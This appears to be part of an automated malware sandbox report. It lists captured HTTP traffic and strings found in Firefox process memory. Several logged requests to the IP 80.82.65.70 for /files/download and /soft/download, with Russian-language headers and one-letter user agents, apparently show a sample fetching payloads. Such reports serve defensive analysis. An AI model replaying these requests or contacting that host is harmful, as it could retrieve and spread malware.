                          Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                          Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                          Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                          Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                          Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                          Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                          Source: global trafficHTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: dHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: sHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                          Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                          Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                          Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                          Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                          Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                          Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                          Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                          Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                          Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                          Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                          Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                          Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
                          Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
                          Source: firefox.exe, 00000018.00000002.3104720613.000001C7AE321000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3157826140.000001C7AF6BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: "url": "https://www.facebook.com/", equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000018.00000002.3104720613.000001C7AE321000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3157826140.000001C7AF6BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: "url": "https://www.youtube.com/", equals www.youtube.com (Youtube)
                          Source: firefox.exe, 00000018.00000002.3104720613.000001C7AE321000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3157826140.000001C7AF6BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000018.00000002.3104720613.000001C7AE321000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3157826140.000001C7AF6BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.twitter.com (Twitter)
                          Source: firefox.exe, 00000018.00000002.3104720613.000001C7AE321000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3157826140.000001C7AF6BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.youtube.com (Youtube)
                          Source: firefox.exe, 00000018.00000002.3070093790.000001C7AD703000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: *://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000018.00000002.3039047204.000001C7AD6B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: -l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Wikipedia&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.reddit.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="R"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/reddit-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Reddit<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Reddit&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" href="https://twitter.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="T"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/twitter-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Twitter<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;Twitter&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li></ul><div class="edit-topsites-wrapper"></div></div></section></div></div></div></div><style data-styles="[[null]]"></style></div><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div></div></div></div><style data-styles="[[null]]"></style></div></div></main></div></div> equals www.twitter.com (Twitter)
                          Source: firefox.exe, 00000018.00000002.3396654277.000001C7B2653000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3317668611.000001C7B1AFA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.3396654277.000001C7B2673000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 8www.facebook.com equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000018.00000002.3070093790.000001C7AD703000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: @mozilla.org/addons/addon-manager-startup;1webcompat-reporter@mozilla.org.xpihttps://smartblock.firefox.etp/play.svg*://c.amazon-adsystem.com/aax2/apstag.js*://static.criteo.net/js/ld/publishertag.js*://web-assets.toggl.com/app/assets/scripts/*.js*://libs.coremetrics.com/eluminate.js*://track.adform.net/serving/scripts/trackpoint/pictureinpicture%40mozilla.org:1.0.0*://static.chartbeat.com/js/chartbeat_video.js@mozilla.org/network/safe-file-output-stream;1FileUtils_closeSafeFileOutputStream@mozilla.org/network/file-output-stream;1*://www.everestjs.net/static/st.v3.js*FileUtils_openAtomicFileOutputStreamhttps://smartblock.firefox.etp/facebook.svg*://connect.facebook.net/*/sdk.js**://*.imgur.com/js/vendor.*.bundle.js*://www.rva311.com/static/js/main.*.chunk.jswebcompat-reporter%40mozilla.org:1.5.1*://www.google-analytics.com/plugins/ua/ec.js*://www.googletagservices.com/tag/js/gpt.js**://pagead2.googlesyndication.com/tag/js/gpt.js**://cdn.adsafeprotected.com/iasPET.1.js*://ssl.google-analytics.com/ga.js*://imasdk.googleapis.com/js/sdkloader/ima3.js*://static.adsafeprotected.com/iasPET.1.js*://adservex.media.net/videoAds.js**://*.moatads.com/*/moatheader.js**://cdn.optimizely.com/public/*.js*://*.vidible.tv/*/vidible-min.js**://www.google-analytics.com/analytics.js**://www.google-analytics.com/gtm/js**://www.googletagmanager.com/gtm.js**://js.maxmind.com/js/apis/geoip2/*/geoip2.js*://s.webtrends.com/js/advancedLinkTracking.js*://s.webtrends.com/js/webtrends.js*://s.webtrends.com/js/webtrends.min.jsresource://gre/modules/ConduitsParent.sys.mjs equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000018.00000002.3070093790.000001C7AD77C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: @mozilla.org/uriloader/handler-service;1^([a-z+.-]+:\/{0,3})*([^\/@]+@).+Failed to execute WebChannel callback:devtools/client/framework/devtoolsdevtools/client/framework/devtools-browser@mozilla.org/dom/slow-script-debug;1Failed to listen. Listener already attached.resource://devtools/shared/security/socket.jsbrowser.fixup.dns_first_for_single_wordsJSON Viewer's onSave failed in startPersistencedevtools.performance.popup.feature-flagreleaseDistinctSystemPrincipalLoader@mozilla.org/network/protocol;1?name=file^[a-z0-9-]+(\.[a-z0-9-]+)*:[0-9]{1,5}([/?#]|$)browser.fixup.domainsuffixwhitelist.^([a-z][a-z0-9.+\t-]*)(:|;)?(\/\/)?DevTools telemetry entry point failed: Unable to start devtools server on get FIXUP_FLAG_FORCE_ALTERNATE_URIresource://devtools/server/devtools-server.js@mozilla.org/network/protocol;1?name=defaultdevtools.debugger.remote-websocketget FIXUP_FLAG_ALLOW_KEYWORD_LOOKUPbrowser.urlbar.dnsResolveFullyQualifiedNamesget FIXUP_FLAGS_MAKE_ALTERNATE_URIGot invalid request to save JSON datadevtools.performance.recording.ui-base-url{9e9a9283-0ce9-4e4a-8f1c-ba129a032c32}Failed to listen. Callback argument missing.DevToolsStartup.jsm:handleDebuggerFlagresource://gre/modules/JSONFile.sys.mjsextractScheme/fixupChangedProtocol<http://www.inbox.lv/rfc2368/?value=%shttp://win.mail.ru/cgi-bin/sentmsg?mailto=%shttps://e.mail.ru/cgi-bin/sentmsg?mailto=%s{33d75835-722f-42c0-89cc-44f328e56a86}gecko.handlerService.defaultHandlersVersionhttps://mail.yahoo.co.jp/compose/?To=%shttp://poczta.interia.pl/mh/?mailto=%shttps://poczta.interia.pl/mh/?mailto=%shandlerSvc fillHandlerInfo: don't know this type@mozilla.org/uriloader/local-handler-app;1@mozilla.org/uriloader/web-handler-app;1resource://gre/modules/DeferredTask.sys.mjsresource://gre/modules/FileUtils.sys.mjs_injectDefaultProtocolHandlersIfNeededCan't invoke URIFixup in the content processisDownloadsImprovementsAlreadyMigratedScheme should be either http or https@mozilla.org/uriloader/dbus-handler-app;1resource://gre/modules/NetUtil.sys.mjs@mozilla.org/network/file-input-stream;1resource://gre/modules/FileUtils.sys.mjshttp://compose.mail.yahoo.co.jp/ym/Compose?To=%s_finalizeInternal/this._finalizePromise<resource://gre/modules/DeferredTask.sys.mjsresource://gre/modules/ExtHandlerService.sys.mjsresource://gre/modules/URIFixup.sys.mjs@mozilla.org/network/async-stream-copier;1resource://gre/modules/JSONFile.sys.mjshttps://mail.inbox.lv/compose?to=%s{c6cf88b7-452e-47eb-bdc9-86e3561648ef}Must have a source and a callback@mozilla.org/network/input-stream-pump;1newChannel requires a single object argumentNon-zero amount of bytes must be specified@mozilla.org/intl/converter-input-stream;1https://mail.yahoo.co.jp/compose/?To=%shttps://mail.yandex.ru/compose?mailto=%shttps://mail.inbox.lv/compose?to=%sSEC_ALLOW_CROSS_ORIGIN_SEC_CONTEXT_IS_NULLFirst argument should be an nsIInputStream@mozilla.org/network/simple-stream-listener;1https://poczta.interia.pl/mh/?mailto=%s@mozilla.org/uriloader/handler-service;1@mozil
                          Source: firefox.exe, 00000018.00000002.3384694589.000001C7B2509000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: [{incognito:null, tabId:null, types:["image"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000018.00000002.3384694589.000001C7B2506000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: [{incognito:null, tabId:null, types:["imageset"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
